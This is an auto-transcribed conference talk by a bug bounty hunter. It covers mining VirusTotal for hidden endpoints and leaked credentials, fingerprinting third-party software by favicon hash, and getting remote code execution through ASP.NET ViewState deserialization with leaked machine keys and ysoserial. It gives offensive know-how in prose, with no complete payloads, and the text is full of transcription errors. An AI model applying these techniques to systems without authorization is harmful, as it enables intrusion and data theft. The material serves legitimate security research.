Art of VirusTotal Hacking

So this is the talk we were all waiting for. Uh we have godfather Orva. He doesn't need any uh introduction. Uh one of the top hackers in mostly all the uh bug bounty platforms. So yeah uh uh the talk is all about uh reconnaissance and uh using virus total. So yeah let's let's get started with them. Take this. Hi everyone. Okay, this is Orwa Godfather and our topic today is going to be a little bit interesting. So I want to see a lot of hands whose we have here doing back bounty. Let me see some hands. Oh okay. So uh our topic today it can help any bug hunter and it can help any customer or anyone working

in the cyber security. So the topic title today uh we can see on the title it's the art of virus total hacking but I made a little change. Yeah it's okay. I made a little change to make it the art of real hacking and adverse total just a topic from the full topic. To introduce myself, I'm working as a full-time bug hunter under username or godfather. full-time back bounty hunter, security researcher, erh content creator in bugger crowd, very good collaborator in top 50 in bugger crowd and in 23 in P1 uh for reporting critical bugs on bugger crowd more than 1,000 bug submitted high and critical uh more than 15 zero day I discovered and CVE I'm a travel gamer and cooker

So the topic today is the art of verse total hacking. The first one, the second one is zero day hacking and the last one is machine key and view state serialization vulnerability. Are you ready again? Are you ready? Yeah. Let's start. Okay. verse total hacking. the reverse total hacking today after this topic we can know for any target you want to hunt for or if you want to secure our company we can know for any subdomain or any app IPs and origin IPs in the same time unique endpoints no one can find it in other resource unique subdomains and open ports in the same time a credentials in some cases a clear text credentials and

sometimes pay 64 credentials and tokens as well. So I think everyone here know what's virus total but let's give a quick short about virus total. Versus total is popular online service that analyze files and URLs for potential viruses and malware and other traits. So uh v total inspect item with more than 70 antivirus scanner and URL domain block listing services in some cases and to be honest I don't know how some websites or most websites endpoints and internal endpoints IPs get archived on virus total maybe via uh user submission automated crawling analyzes reports and there is Other ways anyone use the virus total know the usual method that we can see here or we can see here like

life. So anyone want to scan his app he choose a file he upload a file no matter how how is it the file exe file DL file any file and from that file he spent checking if there is any viruses any traits in the same time checking the end points everything inside that file now last year when I was here I talk about a perfect cool tool to gathering endpoint this tool it's called way more This tool is perfect. It's gathering endpoint as you can see from web archive uh from command URL from alien vault from URL scan and it was a little update that gathering endpoint from v total as you can see here but when I try to use

it I follow the logs I found that it's not getting endpoints from v total because there is a very hard limit on calling the API calls. So I start using that manually.

So today I'm going to present here the memory extract and all examples and I'm going to drop today an old topic a real scenario examples a real target and I'm going in the end uh share with you a private script together endpoints from virus total. So discovering you have to create account as a start and virus total then get a API key then we can use this endpoint. Endpoint we can add to API key value the API key and to domain value the domain and should be the specific domain with subdomain and we have here a

example. So what we can get from using just this URL on the browser? First thing subdomains and in the same time unique subdomains. Second thing IPs and mostly origin IPs, endpoints. These endpoints include in a lot of cases credentials get archived or tokens for activation account reset password or get unauuthorized access for the panel. Here are example for fixed credentials like for uh on octa service. Here's the example and in some cases you can find the credentials like this but base 64 you have to encode it. Now scenario of B1 and P2 bugs it mean high and critical bugs you can get it from use it just verse total information disclosure endpoint now a lot of people

they missed uh when they gathering endpoints the specific extension GBG and PNG and picture extensions they remove it from uh governing the end points but if you're working on a functional web app or anything like banks this extension it's important because in a lot of cases can give you a like access for check in a GBG or a picture extension file or invoices or important PII as well information uh disclosure endpoint for virtual card gift card for like uh in store service or uh like Starbucks like Uber like all of these service you can get in some cases voucher card and uh gift card and that something can be reported information disclosure end points the txt file the XML file PHP

file you know all of this users and passwords or emails endpoints a clear text or encoded tokens API keys that can lead to account take over or get unauthorized access or if you have a panel and don't have a function to create account with some specific endpoint you can get access to create account on that panel backup files and that's so so important virus total and like such as example ISO exe file 7z tar gzdl as well and authorized access via unique open ports you can sometimes finding origin IPs more than any other resource so you know me or most of you know me in recon for endpoints or for IP. I try everything everything but the

last thing I found it have like a unique resource and very interesting use source it was virus total in endpoints and in origin ips when we start looking for endpoints manually or if we use the script that I'm going to share we have to start searching that endpoints so here a little quick keywords can help you to find a specific things for backup files as you can see file z7 exe gz and a lot of other extension for backup files you can search for token equal or api key equal or slash reset password slash or we can reset- password or registration endpoint we can search directly for equal equal That's means something like token or decoded base

64. We can search for com for to check open port. We can search for at to find directly a email. And beside the email, we can find the password. We can search for code equal. We can search for file extension. That's important as well like ASBX, ASHX, PHP, GSP, CGI, XML, all of this stuff. The important tip in Veros total if we have UAT-dev. It can give us a different results from uat1-de. So you have to check all subdomains one by one. Here's the script that I'm going to share. It was very hard to create a script gathering endpoint. So I used uh Tess Arman to help me with that and big thanks for him to help me with this

script. The script here as you can see it's easy to use installation. uh then know then you have to create a three account with the three API keys then add that three API keys to this file and here we have an example for

that and then we can uh run all the subdomains file and print the output and then we can filter that by use e-grip And after that we have already list of amazing endpoints. Let me change it now to publicly. And this is the first one.

[Music] No, I think I will do it later. I didn't add the full password. Yeah. Okay, I will do it after that. Must take heavens. Yeah, but I sure I will change it to public.

It's because of you Arman. You keep telling me don't post it. Don't post [Music] it. This is kept when you run it on uh subdomains list. It's take a little bit time but it's in the end it's give you a good results. So it's give you a three subdomains end points per minute. It mean 180 subdomains per hour. So this script it's generate three subdomains per minute. 180 subdomains per hour. And here's a example video the script when it's

running. Here's an example for end points.

And don't worry, it's a public target and I got authorized to post

that. And here are examples for uh some critical reports from

versti from using verse total. You can see the virus total endpoint in the report and the bounty in the same time. A second one it was access to identity card, passport and a lot of other sensitive file and in the same time by us total this bag. It was so interesting because this endpoint as you can see it in the virus total page CNSOP2 this domain I try to find any endpoint for this app it's show nothing it's keep redirected to SS or Microsoft I try Bing I try Dor I try way back URL web archive alien vault who else a lot of a lot of other resources and didn't get just single end point even with

fuzzing. But in verse total I directly found this endpoint and the same bag same time back directly a DL file analyze it then I start code review and I found a lot of sensitive stuff and even I found some bugs on this endpoint because I get a live end point. Here's some other examples by using verse total and how can lead to get you to find bugs like I found a specific endpoint from virus total then I was after that endpoint and I got a backup file insert that backup file someh sensitive stuff including machine key we will talk about that later and how I get the RC for that total endpoint then normal fuzzen

then I found spring boot actor then hip dump file and it's b1 for sure there's total end point then there's total bottom then I test that bottom and I found local file inclusion and reset password total code for reset password and I got account takeover now let's start with a zeroday hacking

A zero day is a vulnerability in a software or hardware that's typically unknown for the vendor and for which no path or other fix is available. Let's try to talk about zero day more easier. Some service selling uh company selling service for a lot of other companies. If someone found a bug on this service, it's can affect on all companies and that's what it's called like a zero day. It can be happened in a software, it can be happen on a hardware or a specific product. But we will talk today about the softwares that installed apps or the third parties. Now third party it's a huge number of third parties that's selling services for company. Here's the example

like mostly the third party have the domain and the company have the subdomain name and other cases it can be third third party name as a subdomain and the company name is a domain and we have here example for third party octa service now uh Grog.io and the other example for third party and subdomain. Now to get a zero day what should we do? We should in first find the software or install it app or the third party. The next thing we have to start recon about that software or install it app or third party and forget our target. Then we have to find a bug in the software or that install it app or that

third party someone look for that like it's a hard thing but it's the easy thing the hard thing it's find the software itself you have to test the same bag on more than two company or three company and if you get a valid bag then in this time you have a zero day or one day if no one uh get a CVE for that a quick way I talk a lot about how to find a third parties but here a quick way to find like if we see like company SBMW and we want BMW as a subdomain and we know we want to know all the company after that and mostly it's third party so we use dash to clear the results that

I want don't want to see and in this case we have the other results and there other examples I write it down we can use this as well like in if we can see here BMW start but now BMW star it give us other results and other third

parties now I talk and this is slide from last talk here last year. How if you doing recon on some specific company get all the fif icon for this company by using fufa. So we have a dork for the company then we can start pick up the icons and now we have the fif icons. Now we are going to recon for fif icons not for company. As we can see here all of this fif icon it's for the same company. All of you know I think this company. The main erh fif icon is the first one. The second one is different and the third one is different and after that is different and the last one is

different. Now that's mean here on this app there is a software installed or it's a third party or some product running on this app. Now we have to know that we have to know what's the fif icon for this software and we have to know what is this software in the same time we can add start locate the f icon by running a httpx uh command-path uh /f icon ico and print the result mc 200 and the output in the same Now there is a tip here. Not all fiv icon is stored in the source like a fiv icon ico. So we have to view the source and search for extension I co or search

for extension f icon. Now we found the f icon endpoint. What you do after that? Now there is a lot of methods. There is a lot of tools. Uh but the the favorite one for me it's check the fif icon on uh this domain f icon-km.uk why because from here when you search for f icon we can get two things f icon hash and md5 md5 help us in something and f icon hash in the other thing. Here's a real FYI example for installed software. We can read up there the name of software. It's fraud sites or something like that. The next thing we check the fif icon and as you can see we have this

fifth icon hash and we have this uh MD5. What should we do after that? Now in census IO we can use this DR for the MD5 because we can't search for fifth icon hash in Sensis IO. So here's the door and as you can see here's the results for uh the same software in showdown we can take the fifth icon hash and the torque is http icon hash and as you can see in the same time we have a 324 results for the same software. There is a zoom IHK as well. It's give a perfect result and the D for this one it's icon hash and just paste the icon hash. Now we know what is the software

or the third party what we can do after that to start testing. So the first thing if the program software running with a strong W we can by using this method running the same software or the same app on a different IP or a different thing without a W or we can install this app locally and testing without W in the same time if we have a target and we didn't found any end point even on virus total on anything we can start look for other targets that use this software and look for endpoints of that targets and try it on our

target also what we can do uh to test already hackar tal about authentication bypass via cross subdomain coirisu and authentication bypass bypassing registration so all of these bags it happens with us on a zero is by the same way by the same method. What else we can do to test? We can start search for backup file for the software itself. Then download and install the software. try to look for the software source in the GitHub or GitLab or other resource and maybe we can get a luck by find a perfect endpoint to test to get us authorized access or default credentials or some API calls or a machine key in ASPET and from here let's start with the

easy topic and easy to understand about the machine key and how to explo exploit machine key in a view state serialization machine key and view state

decentralization in this topic I'm going to share what is the view state and machine key how to find the view state and how to find the machine key and test cases ready extension to find and test in view state tool and machine key word list private world list machine key to test the view state and example for uh a zero day. So uh as you can see the view state it's a method that ASBNET framework use it by default to perceive the page and control values between web pages and mostly it came encoded and the machine key it's a class provide methods to expose the hashing and encryption logic in ASPET machine key it's used for a lot of

stuff but the important one that we going to use here it's about the view state Encryption and

validation in view state calls there is a machine keys identify this calls. So if we know the machine key for the view state then we can uh generate a serialized pay by load and get the RC and that's the decentralization vulnerability machine key and view stateization hacking how to find the view state in the first thing in a spet endpoints calling server such such as ASP, ASPX, ASPHX. Now, how to find the machine keys? If we can access to the web config file normally or if we can access to web config file via local file inclusion bug or via machine key word list or via download the software and I talk about that in zero day discovering like try to

find the software source and install the software. In some cases, you can find a machine key and then you can get the RC for all the product that use it. Here's the examples for view state. This is the first one, view state value. Here's another example. And here's another example. Now test cases for the view state des serialization. There is two test. First one if the MAC is not enabled and here we can start exploiting directly without need for machine key. But if the MAC is enabled here, we have to get the machine key. And in this case, we can start testing this machine keyword list or try to download the software as I said now and looking for

machine key in the web config file. Here's a ready extension and it's amazing extension. It's called a view state editor. Now let's see how the result it came with this extension when you use it. on a asbnet target when you intercept the request or back to your history there is a view state as you can see now it show the MAC is enabled now MAC is enabled here we have to get the machine key here's another example if you can see like this it's Mac is not enabled you can start directly exploit that via yeso serial

tools and machine keys word list to test the view state. First one uh the ASP.NET worker and this tool to test the machine key in a view state. Yes serial I think most of you know it this tool to generate a serialized payload. So the tip here if the MAC is not enabled you can uh is in yeah is enabled you can skip the first tool and start directly exploit via your serial. And the important tip in the same app different endpoint for ASPX endpoint you have to test all this endpoint not just a single one because uh the value of a view state keep change it from ASPX file to other one on the

same app and it's very helpful in bypasses cases as well. Now if MAC is not enabled simply you can generate the via yes serial asalize by load and send it in a post request to perfume RC and here already example to username command us serial.exe-o exe-o paste 64 and all of this stuff. And the next step, we can copy the payload from uh from this command. Then replace it in a view state uh parameter value as a post request. Then send the request to your barb or server and the response is came for your collaborator. It's like that. Now if Mac is enabled, you can download this tool. I'm going to change it publicly after we

done for sure. Erh, in this tool we can find a machine keys, edit machine keys because I add some machine keys and it's a gift for you. And then after installing this tool, we can run this command. We can replace uh the view state with the view state parameter value in the source of app and replace the view state uh generator by the view state generator value. And here yeah let me back for the value to let you see it. Yeah, here's example for a view state generator value. It's 7 A capital F uh 1

AD. Here we have a example video when we run this tool to test machine key. Here we have the view state value and view state

generator. I'm going to fast feed you a little bit.

Yeah. And now it's ready to go.

As you can see here it show the key not found. In this case we have to get the right machine key. But if it show the key is found then we can directly start

exploiting. Here's an example. When it's get key found, we have uh direction key, validation

key, the most important for us from here it's uh I just highlighted and validation keys. That's what we are going to use in ESO serial uh command. Then next step we copy the validation key and the full command is going to be like as you can see and replace the view state generator as I told with the parameter value. It replace the key type from what you get and replace the validation key with validation key value. And here a radio command to exploit the username as well. And yeah just like uh first thing we copy the ready by load we drop it in the view state value of parameter and we send it as a post

request from all the topic that we talk today uh very perfect zero day that we found we found the software by checking and looking for fiv icon hash then we found a software source backup via vers total. Now we installed that software. We start code review and we found a web config file is ready with a machine key. Then we test that machine key on all the customers that use that product and we got RC on all that customers. And here's example from bounties just on one customer. And yeah, this is the end of my presentation. I hope you like it. And if you have any question, even my password if you know it now.

[Music] No question then. It's perfect. Even you can ask me will you come to me or there is one want to

ask I don't have a question can you show us your bookmarks maybe maybe next year I will open my profile for you and uh I start moving you from report to report. Yeah. So, thank you all and I hope you enjoy the talk today.